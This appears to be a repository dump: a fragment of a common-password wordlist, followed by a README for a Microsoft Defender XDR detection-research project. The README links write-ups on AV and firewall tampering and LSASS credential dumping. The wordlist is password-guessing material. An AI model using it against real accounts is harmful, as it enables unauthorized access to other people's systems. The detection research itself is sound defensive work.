121212123
letmein1234
sunshine1234
password1abc!
qwerty@123
welcome12345
dragon12345
mypassw0rd
letmeinabc
adminqwerty
dragon@123
-------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
# ResearchDev
In this `ResearchDev` repository, I would like to share threat detection insights across ***Microsoft Defender XDR***.

- [x] Effectively captures all suspicious activities across email, endpoint, identity and applications.
- [x] Correlates alerts from the different Defender products into a single incident; this holistic view gives SOC personnel comprehensive monitoring and management of security incidents.

| Product | TEST/METHOD & Threat Detection |
|:--------|:-------------------------------|
| MDO | [MDO Safe Attachments : File Detonation Validation](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV01-MDO-FileDetonation/README.md) |
| MDE | [Microsoft Defender AV Tampering, Defense Evasion](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV02-AVtampering/Dev02-AVTampering.md) |
| MDE | [Windows Defender Firewall rule, EDR/AV Communication Tampering](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV03-FirewallTampering/Dev03-FirewallTampering.md) |
| MDE | [LSASS credential dumping, MiniDump](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV04-LSASSdumping-MiniDump/Dev04-LSASSdumping-MiniDump.md) |

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
--------------------------------------------------------------------------------